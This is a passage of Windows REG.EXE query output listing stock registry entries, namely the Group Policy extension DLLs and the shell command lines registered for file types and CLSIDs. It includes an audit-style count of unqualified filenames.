NT\CurrentVersion\Winlogon\GPExtensions\{E5094040-C46C-4115-B030-04FB2E545B00} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-20 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E62688F0-25FD-4c90-BFF5-F508B9D2E31F} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-21 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{F312195E-3D9D-447A-A3F5-08DFFA24735E} DisplayName REG_EXPAND_SZ @dggpext.dll,-600 DllName REG_EXPAND_SZ dggpext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{f3ccc681-b74c-4060-9f26-cd84525dca2a} DisplayName REG_EXPAND_SZ @auditcse.dll,-3000 DllName REG_EXPAND_SZ auditcse.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{F9C77450-3A41-477E-9310-9ACD617BD9E3} DisplayName REG_EXPAND_SZ @gpprefcl.dll,-15 DllName REG_SZ C:\Windows\System32\gpprefcl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{FB2CA36D-0B40-4307-821B-A13B252DE56C} DisplayName REG_EXPAND_SZ @gptext.dll,-203 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{fbf687e6-f063-4d9f-9f4f-fd9a26acdd5f} DisplayName REG_EXPAND_SZ @gptext.dll,-205 DllName REG_EXPAND_SZ gptext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{FC491EF1-C4AA-4CE1-B329-414B101DB823} DisplayName REG_EXPAND_SZ @dggpext.dll,-600 DllName REG_EXPAND_SZ dggpext.dll End of search: 100 match(es) found.Note: 68 of these 100 filenames are either unqualified or contain an environment variable.
All command lines registered with Programmatic Identifiers or Client Types:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "Command" /K /S /VE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Application.Manifest\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbApplication %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Application.Reference\shell\open\command (Default) REG_SZ "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\dfshim.dll",ShOpenVerbShortcut %1|%2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\mspaint.exe\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\notepad.exe\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\notepad.exe\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\photoviewer.dll\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\provtool.exe\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Open "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wmplayer.exe\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\wordpad.exe\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AudioCD\shell\play\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /prefetch:3 /device:AudioCD "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmd.exe /C "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\brmFile\shell\Open\command (Default) REG_SZ "PrintBrmUI.exe" /import /file:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder\Shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CABFolder\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\campfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CATFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCAT %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cdmpfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CERFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddCER %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CERFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCER %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CertificateStoreFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenSTR %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\certificate_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /certificate "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\hh.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00021400-0000-0000-C000-000000000046}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0AFACED1-E828-11D1-9187-B532F1E9575D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0DF44EAA-FF21-4412-828E-260A8728E7F1}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Manage\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\CompMgmtLauncher.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{38A98528-6CBF-4CA9-8DC0-B1E1D10F7B1B}\Shell\OpenWithoutDiagnostics\Command (Default) REG_EXPAND_SZ rundll32.exe %SystemRoot%\system32\van.dll,RunVAN /disablediagnostics HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3f6bc534-dfa1-4ab4-ae54-ef25a74e0107}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rstrui.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{40419485-C444-4567-851A-2DD7BFA1684D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\telephon.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{48e7caab-b918-4e58-a94d-505519c795dc}\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ea4f148-308c-46d7-98a9-49041b1dd468}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mblctr.exe /open HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\intl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{67718415-c450-4f3c-bf8a-b487642dc39b}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\optionalfeatures.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C8EEC18-8D75-41B2-A177-8831D59D2D50}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Options_RunDLL 0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{725BE8F7-668E-4C7B-8F90-46BDB0936430}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\main.cpl,@1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{74246bfc-4c96-11d0-abef-0020af6b0b7a}\Shell\RunAs\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %SystemRoot%\system32\devmgmt.msc HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}\Shell\Open\Command (Default) REG_EXPAND_SZ netplwiz.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{80F3F1D5-FECA-45F3-BC32-752C152E456E}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\tabletpc.cpl @1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\NoAddOns\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" -extoff HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{87D66A43-7B11-4A28-9811-C86EE395ACF7}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\srchadmin.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A3DD4F92-658A-410F-84FD-6FBBBEF2FFFE}\Shell\Open\Command (Default) REG_SZ C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\inetcpl.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B2C761C6-29BC-4f19-9251-E6195265BAF1}\Shell\Open\Command (Default) REG_SZ "C:\Windows\System32\colorcpl.exe" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\changehomegroupsettings\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\sharewithdevices\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.NetworkAndSharingCenter /page ShareMedia HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\starthomegrouptroubleshooter\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\msdt.exe -id HomegroupDiagnostic HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell\viewhomegrouppassword\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.HomeGroup /page Passkey HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D4480A50-BA28-11d1-8E75-00C04FA31A86}\Shell\Open\Command (Default) REG_EXPAND_SZ rundll32 %SystemRoot%\System32\shwebsvc.dll,AddNetPlaceRunDll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E2E7934B-DCE5-43C4-9576-7FE4F75E7480}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\timedate.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E44E5D18-0652-4508-A4E2-8A090067BCB0}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\control.exe /name Microsoft.DefaultPrograms HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F82DF8F7-8B9F-442E-A48C-818EA735FF9B}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\tabletpc.cpl @0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\NOTEPAD.EXE /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\cmd.exe /C "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder\Shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CompressedFolder\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /contact "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\contact_wab_auto_file\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cplfile\shell\cplopen\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe "%1",%* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cplfile\shell\runas\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,Control_RunDLLAsUser "%1",%* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CRLFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddCRL %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CRLFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenCRL %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\desktopthemepackfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\AllItems\Shell\Microsoft.DxpOpen\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\AllItems\Shell\Microsoft.DxpOpenInNewWindow\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{0850302A-B344-4fda-9BE9-90576B8D46F0}\Shell\Bluetooth\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\bthprops.cpl,,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{70FFD812-4C7F-4C7D-926A-637B7DD852AF}\Shell\DeviceInstall\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\newdev.dll,DeviceInternetSettingUi 2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DeviceDisplayObject\InterfaceClass\{884b96c3-56ef-11d1-bc8c-00a0c91405dd}\Shell\Regional\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe %SystemRoot%\System32\intl.cpl,,/p:"keyboard" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Cabinet\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /cab "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /path "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msdt.exe /path "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /sys /load "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Perfmon.Document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /sys /open "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Diagnostic.Resmon.Config\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\perfmon /res /load "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\background\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\background\shell\Powershell\command (Default) REG_SZ powershell.exe -noexit -command Set-Location -literalPath '%V' HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\Powershell\command (Default) REG_SZ powershell.exe -noexit -command Set-Location -literalPath '%V' HKEY_LOCAL_MACHINE\SOFTWARE\Classes\DLNA-PLAYSINGLE\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" "%L" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\docxfile\shell\printto\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-passphrase\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdechangepin.exe -pw %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\change-pin\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdechangepin.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\cmd\command (Default) REG_SZ cmd.exe /s /k pushd "%V" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizard.exe %1 T HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\encrypt-bde-elev\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizardElev.exe %1 T HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\find\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\manage-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\control.exe /name Microsoft.BitLockerDriveEncryption /page ?InitialVolume==%1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\Powershell\command (Default) REG_SZ powershell.exe -noexit -command Set-Location -literalPath '%V' HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizard.exe %1 V HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\resume-bde-elev\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\BitLockerWizardElev.exe %1 V HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shell\unlock-bde\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\bdeunlock.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\emffile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\eventvwr.exe /l:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\evtxfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\eventvwr.exe /l:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command (Default) REG_SZ "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.BurnSelection\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.EraseDisc\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocActionId.ZipSelection\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Explorer.AssocProtocol.search-ms\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FaxCover.Document\shell\open\command (Default) REG_SZ C:\Windows\System32\fxscover.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FaxCover.Document\shell\print\command (Default) REG_SZ C:\Windows\System32\fxscover.exe /P "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\FindApp.DVD\Shell\Play\command (Default) REG_EXPAND_SZ explorer "ms-windows-store://search/?query=DVD" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\fonfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ftp\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\giffile\shell\Open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\giffile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\gmmpfile\shell\Install Profile\command (Default) REG_SZ "colorcpl.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\edit\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\open\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Group "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\group_wab_auto_file\shell\print\command (Default) REG_EXPAND_SZ "%ProgramFiles%\Windows Mail\wab.exe" /Print "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\winhlp32.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htafile\Shell\Open\Command (Default) REG_SZ C:\Windows\SysWOW64\mshta.exe "%1" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}%U{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command (Default) REG_SZ "C:\Program Files\Internet Explorer\iexplore.exe" %1 